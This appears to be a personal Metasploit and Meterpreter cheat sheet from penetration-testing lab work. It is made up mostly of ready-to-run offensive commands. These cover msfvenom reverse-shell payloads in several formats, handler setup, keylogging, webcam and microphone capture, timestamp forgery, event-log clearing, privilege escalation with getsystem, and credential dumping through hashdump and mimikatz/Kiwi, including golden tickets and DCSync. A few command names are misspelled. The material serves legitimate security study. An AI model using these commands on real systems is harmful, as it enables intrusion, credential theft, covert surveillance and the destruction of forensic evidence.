# Metasploit and Meterpreter ## Basic commands ``` show payloads \\to list all payloads info \alternative of show options, give more details search type:auxiliary telnet \\to limit search to particular module types unset \\to revert settings options setg \to set option for all current and future selected modules exploit -z \\background the session getpid \\ get process ID ``` ## Finding files in meterpreter ``` search -f flag*.txt (in meterpreter) ``` ``` find / -name "flag" ``` ## Payloads ### List Payloads ``` msfvenom -l payloads msfvenom --list formats \\output formats ``` ``` msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 LHOST= LPORT= -f exe > shell-x86.ex ``` Based on the target system's configuration (operating system, install webserver, installed interpreter, etc.), msfvenom can be used to create payloads in almost all formats. Below are a few examples you will often use: In all these examples, LHOST will be the IP address of your attacking machine, and LPORT will be the port on which your handler will listen.\ The .elf format is comparable to the .exe format in Windows. These are executable files for Linux. However, you may still need to make sure they have executable permissions on the target machine. For example, once you have the shell.elf file on your target machine, use the chmod +x shell.elf command to accord executable permissions. Once done, you can run this file by typing ./shell.elf on the target machine command line.

Linux Executable and Linkable Format (elf)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf

Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe

PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php

ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp

Python
msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py

If msf is having some error start database service ``` service postgresql start ``` ## Multi handler ``` use exploit/muli.handler exploit -j -z //runs in background ``` Useful commands meterpreter ``` sysinfo getuid ifconfig pwd \\(mostly downloads folder) ls cat cd keyscan_start //keylogger keyscan-dump idletime ``` To modify the timestamp MACE (modified, accessed,created,entry) attributes ``` timestomp secret.ext -m "2/11/2022 8:10:03" ``` To view timestamp entries ``` timestomp secret.ext -v ``` {% hint style="info" %} -a accessed -c created -e entry modified {% endhint %} ## Hidden files in shell First get the shell, then use the following command. ``` dir /a:h ``` ## List all running services in shell ``` sc querytex type=service state=all ``` ## Other shell commands ``` netsh firewall show state \\firewall state netsh firewall show config wmic cpu get wmic /node:"" product get name,version,vendor wmic useraccount get name,sid wmic os where Primary='TRUE' reboot //restarts system ``` ## Dumping hashes in meterpreter ``` hashdump // or try the following use post/windows/gather/smart_hashdump ```

## Metasploit Scanners ``` scanner/discovery/udp_sweep auxiliary/scanner/http/http_version ``` ## Meterpreter commands Core commands will be helpful to navigate and interact with the target system. Below are some of the most commonly used. Remember to check all available commands running the help command once a Meterpreter session has started.\ Core commands * `background`: Backgrounds the current session * `exit`: Terminate the Meterpreter session * `guid`: Get the session GUID (Globally Unique Identifier)
* `help`: Displays the help menu * `info`: Displays information about a Post module * `irb`: Opens an interactive Ruby shell on the current session * `load`: Loads one or more Meterpreter extensions * `migrate`: Allows you to migrate Meterpreter to another process * `run`: Executes a Meterpreter script or Post module * `sessions`: Quickly switch to another session * `ps:` Running Processes ### File system commands * `cd`: Will change directory * `ls`: Will list files in the current directory (dir will also work) * `pwd`: Prints the current working directory * `edit`: will allow you to edit a file * `cat`: Will show the contents of a file to the screen * `rm`: Will delete the specified file * `search`: Will search for files * `upload`: Will upload a file or directory * `download`: Will download a file or directory ### Networking commands * `arp`: Displays the host ARP (Address Resolution Protocol) cache * `ifconfig`: Displays network interfaces available on the target system
* `netstat`: Displays the network connections * `portfwd`: Forwards a local port to a remote service * `route`: Allows you to view and modify the routing table ### System commands * `clearev`: Clears the event logs * `execute`: Executes a command * `getpid`: Shows the current process identifier * `getuid`: Shows the user that Meterpreter is running as * `kill`: Terminates a process * `pkill`: Terminates processes by name * `ps`: Lists running processes * `reboot`: Reboots the remote computer * `shell`: Drops into a system command shell * `shutdown`: Shuts down the remote computer * `sysinfo`: Gets information about the remote system, such as OS ### Others Commands (these will be listed under different menu categories in the help menu) * `idletime`: Returns the number of seconds the remote user has been idle * `keyscan_dump`: Dumps the keystroke buffer * `keyscan_start`: Starts capturing keystrokes * `keyscan_stop`: Stops capturing keystrokes * `screenshare`: Allows you to watch the remote user's desktop in real time * `screenshot`: Grabs a screenshot of the interactive desktop * `record_mic`: Records audio from the default microphone for X seconds * `webcam_chat`: Starts a video chat * `webcam_list`: Lists webcams * `webcam_snap`: Takes a snapshot from the specified webcam * `webcam_stream`: Plays a video stream from the specified webcam * `getsystem`: Attempts to elevate your privilege to that of local system * `hashdump`: Dumps the contents of the SAM database Although all these commands may seem available under the help menu, they may not all work. For example, the target system might not have a webcam, or it can be running on a virtual machine without a proper desktop environment. #### Migrating to system process Search for the PID of explorer.exe and use the migrate command to migrate the current process to the explorer process. ``` ps -S explorer.exe migrate 2332 ```

#### Elevate to the high privilege ``` getsystem ``` Type `getprivs` to view the privileges that the current user has.

These privs are for the user. We can use `getsystem` to elevate the privileges because if `SeImpersonatePrivilege` is present, `getsystem` is likely to succeed using Named Pipe Impersonation. Press enter or click to view image in full size

We have elevated our privileges. #### Uploading Files ``` upload /root/static-binaries/nmap /tmp/nmap upload /root/bash-port-scanner.sh /tmp/bash-port-scanner.sh ```

#### Changing directory ``` cd C:\\Users\\admin\\AppData\\Local\\Temp ``` ## Meterpreter Modules you can also use the load command to leverage additional tools such as Kiwi or even the whole Python language. Loading Python ```shell-session meterpreter > load python Loading extension python...Success. meterpreter > python_execute "print 'TryHackMe Rocks!'" [+] Content written to stdout: TryHackMe Rocks! meterpreter > ``` The post-exploitation phase will have several goals; Meterpreter has functions that can assist all of them. * Gathering further information about the target system. * Looking for interesting files, user credentials, additional network interfaces, and generally interesting information on the target system. * Privilege escalation. * Lateral movement. Once any additional tool is loaded using the `load` command, you will see new options on the `help` menu. The example below shows commands added for the Kiwi module (using the `load kiwi` command). ### Loading Kiwi (mimikatz) ```shell-session meterpreter > load kiwi Loading extension kiwi... .#####. mimikatz 2.2.0 20191125 (x64/windows) .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ Success. ``` These will change according to the loaded menu, so running the `help` command after loading a module is always a good idea.The updated help menu ```shell-session Kiwi Commands ============= Command Description ------- ----------- creds_all Retrieve all credentials (parsed) creds_kerberos Retrieve Kerberos creds (parsed) creds_msv Retrieve LM/NTLM creds (parsed) creds_ssp Retrieve SSP creds creds_tspkg Retrieve TsPkg creds (parsed) creds_wdigest Retrieve WDigest creds (parsed) dcsync Retrieve user account information via DCSync (unparsed) dcsync_ntlm Retrieve user account NTLM hash, SID and RID via DCSync golden_ticket_create Create a golden kerberos ticket kerberos_ticket_list List all kerberos tickets (unparsed) kerberos_ticket_purge Purge any in-use kerberos tickets kerberos_ticket_use Use a kerberos ticket kiwi_cmd Execute an arbitary mimikatz command (unparsed) lsa_dump_sam Dump LSA SAM (unparsed) lsa_dump_secrets Dump LSA secrets (unparsed) password_change Change the password/hash of a user wifi_list List wifi profiles/creds for the current user wifi_list_shared List shared wifi profiles/creds (requires SYSTEM) ``` ### Dumping hashes ``` hashdump ``` If it does not work migrate to some privileged process like **lass.exe** and then try the command ``` ps migrate 764 hashdump ```

### Revert to original user if you pivot somewhere, we can move back with following ``` rev2self ``` ### Post Exploitation Shell to Meterpreter ``` use post/multi/manage/shell_to_meterpreter set SESSION 1 set LHOST 192.212.191.2 run ```